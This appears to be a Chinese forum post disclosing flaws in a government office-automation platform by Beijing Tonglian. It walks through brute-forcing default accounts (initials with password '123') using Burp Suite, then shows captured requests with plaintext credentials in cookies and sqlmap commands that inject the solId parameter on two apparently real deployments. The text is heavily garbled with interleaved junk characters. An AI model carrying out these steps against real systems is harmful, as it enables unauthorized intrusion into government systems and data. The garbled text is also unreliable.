|
- D& R2 i3 P7 W; d5 j7 v
7 A5 P. y) _% t1 Q
8 @7 b2 k: k( [" s! T
) X% Q/ S* Q$ k) ^$ J
平台简介:* W$ l# o2 V3 o& U x1 M! k* j
# H [ a! N* n& w5 w
; q! ^1 ?' O6 D s
) l1 s' h, i& ?1 n4 r9 j8 | ) D; n# @ d. I8 F" Z$ M
$ f3 ~ ?+ W9 O' B- z) `! s
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
) u& O' r, b+ q- h
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
( B% L0 H1 x6 P ~ v+ `
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
8 \& y$ u/ \* g; Y4 f0 S) [1 [9 K 1 g" O n6 ?+ {! L* @
6 S6 Z- O9 V; ~- @/ |- a/ [
' e: n/ M) Z8 ^% `* C+ _7 |% S
! x. `7 j8 v$ C. n2 @% P
' ~& [7 K" D/ B- G 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
& y3 O5 O! z; t* T% ~
4 T; t: ^& j7 t* P# C
! x5 V( |- ?2 t& O4 ] 7 E# g/ ~2 \0 Q( H9 r
3 D' h! ]3 i7 y. G9 [( r7 B7 i
0 g$ v0 k* T, |& W% y http://1.1.1.1:7197/cap-aco/#(案例2-)
% C. P3 T2 K# t1 X% E& i
7 W$ ^5 @- @2 C! r) [# A9 Y. s3 L0 Z- l+ [- b
http://www.XXOO.com (案例1-官网网站)
! t# V* @0 g" K3 r# e3 p( k
/ }3 W1 W8 u! \" r0 s) `
/ {: t1 Q. M4 s b8 h$ W
0 e; W3 A+ |3 z2 V" x V4 ^
/ C; E4 B' F+ [% @6 x2 C; i, z5 E' ?7 q$ X6 ]6 U
漏洞详情:
9 V7 H* q( W$ T* R 8 T* s0 J- M6 Q9 {4 x8 X
; Y, s1 _) R+ j6 X# W* _% V 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试. g+ W& K* C2 k
+ W7 ?" {# G0 g' ~
W; y' Z& e1 m7 W7 J h5 W 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:/ d: R. M4 f9 ?4 S/ x
; {- [7 Q n1 s/ u- n( i2 I* x; ~( C
2 x2 h7 Y- ?# M$ a$ x& ^; X: J
5 R, K# j5 ^* H3 m$ N( \' R; Z( @" q1 H
 : D$ A; q- Y# D3 E- \, K G
* T8 w3 T) S$ z5 J/ T0 g. J
& t$ l$ @+ F# B2 `7 ? q* J
status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:
- M W9 n. M2 C2 c# b
+ _/ i, D( O, _- D$ U6 L5 C* K5 r, c* u4 H1 s$ V
1、案例1-官方网站
$ L0 ^- o9 o# k, v
5 _& t" I0 Y' l6 [+ g/ a* E5 E' ~% w' S7 o$ S. Z; b
GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1# @0 U( q: A0 Q3 e! q
, W/ ]; s# r2 Y; q4 x
: [; K# t! l! z9 o6 P+ t Host: www.XXOO.com* k/ ]6 m5 I, w& B# f
1 |) e$ ?; x7 D3 |7 z5 L- O3 H$ H' m, H# a9 U- `' S$ L# {' z+ J: E
Proxy-Connection: Keep-Alive
0 m/ W7 y( @0 K7 b
# [) {2 w) w" b. H$ Z ?0 Z7 P3 l' Y- l+ C5 w' f8 ~2 J
Accept: application/json, text/javascript, */*; q=0.01& B# J, p8 E! A$ F. m, I+ ]
) {+ Z' n8 c% U' f' d: [
. w5 m0 Q6 K3 P3 J8 w4 O Accept-Language: zh-CN5 v: l/ h, R; }: g' q4 q1 [
# p- `9 w m0 t; W0 c4 i9 A
" v2 W( I5 f. D5 \- u: x9 `
Content-Type: application/json6 w: @ }# E" s4 A" J! f
* K5 i9 ~1 W- D9 S r6 s
! ]6 t/ B8 S* x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko
R; b' ]& s+ k9 _( K
Q* y. c+ Y7 f; X3 m1 B
* L6 t* F& n. T i2 x X-Requested-With: XMLHttpRequest! y0 F* W x8 T5 K9 c6 O1 x
# s4 ^+ {+ Q k6 o: |8 G. T# R
" H% a' Z1 t( L; n0 n Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002$ J! l/ j' U9 n \* c% p6 x
6 j4 c& R8 O+ s' N# A
- i8 j% Y* O9 f Accept-Encoding: gzip, deflate, sdch
4 G' w5 _+ Z' g9 j 2 Y q6 F% ?8 h
0 H/ n" i6 y5 n4 P5 k& ? Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e
; y1 i# U# s: J0 ~; V Q & v$ Y7 j9 K4 k
9 @& r3 P- Z0 {2 W( }3 ]/ P 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
6 U) w( k% b! c8 s6 q* M 8 D; e& f" }- I% \3 U
% n3 z8 b4 [3 H1 P" u0 { 
. `! ?9 @5 _, Y/ u. l4 B1 [
# @; L, r" L1 a) a) P1 A% w' |: p& ]' o& \# w! }
 8 v; Y+ |+ t$ N2 M' x
$ k: c& B6 m' U8 d1 @: s2 `" X1 n z0 a
: a$ o8 r: C( U1 X* T2 m3 D- w
6 W3 g( q" q" D1 U
B$ z% g/ ~( {- S! }- c* d2 x $ T3 ~0 ^1 Y2 F1 S1 m! `8 U
E7 H- x1 e5 `5 @! _
# f) e/ s: U0 w( O; [3 [ 2 A8 n f$ J2 S* Q
$ W& ]; W. x1 x. [4 d; n/ P
8 ~7 M6 q! m8 w" m$ y+ ^ 2、案例2-某天河云平台3 Z; D4 Y' w8 p, a) ?
: O- V0 O, C/ O9 Q& |
' h! O4 f2 X3 T7 B% f GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.15 q! i5 O* h* R- f% u2 y
; ^" X: {. m! S, Y
( [$ j) w* S- Z6 b3 K8 X8 x6 u
Host: 1.1.1.:7197
- f* J; _$ o: B n / }. l; u. o- h+ s! \
: n3 _; N4 ?6 n1 W2 c$ l* D: P Accept: application/json, text/javascript, */*; q=0.01 G) `3 U$ e/ K0 Z2 u% {. w' Z4 `
0 g+ c& o; A0 W
6 @9 R. }# t/ T# b* w* Q8 ^
X-Requested-With: XMLHttpRequest
% c! |% v+ Q6 I " m1 w; J8 d& e
" t0 h3 F/ y7 ]# s5 t User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0
0 E4 c& B: r. M+ r: o: Q( J/ ~
9 M# Y& M( e& m& a7 m# _; @! m& h R
Content-Type: application/json
) F1 s; K- H3 R% e l4 h0 N
5 S+ I* [( ?- e7 f- V9 D5 k6 h9 m( d* t2 x
Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008, G O9 V# u, C: h- G
9 e$ \6 P0 R5 x% r# e# G, `. J6 M
# G$ M* p* e3 o4 a3 T, P
Accept-Language: zh-CN,zh;q=0.8
; }: _0 H1 n3 P# V3 S3 ^ ( e2 s1 |0 H4 c W
0 p: i0 ?; _7 i
Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1
0 Q; `( l6 C1 j) b/ m
/ H7 Z" P" B0 t3 o+ g2 w3 d# g# q4 g" @+ K* N% _
Connection: close! ` ]% ?' K0 @9 I6 t' u
6 x. x' o& }0 O" o _* V) [( A" S8 }) p5 ^
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
" o$ H* y$ E8 K6 n * S- M2 w1 L. Q/ T" X& o
9 m0 `3 T( v( S( B+ t 
6 H8 c7 }' M+ @3 p& t z ! B2 z* @. B2 X9 ]- F% x3 b+ r& l. Q
' C* |6 I1 b- u% p& m3 m
) o7 H4 U* ~% ` H, U | 
发表于 2018-10-20 20:15:17
收藏
支持
反对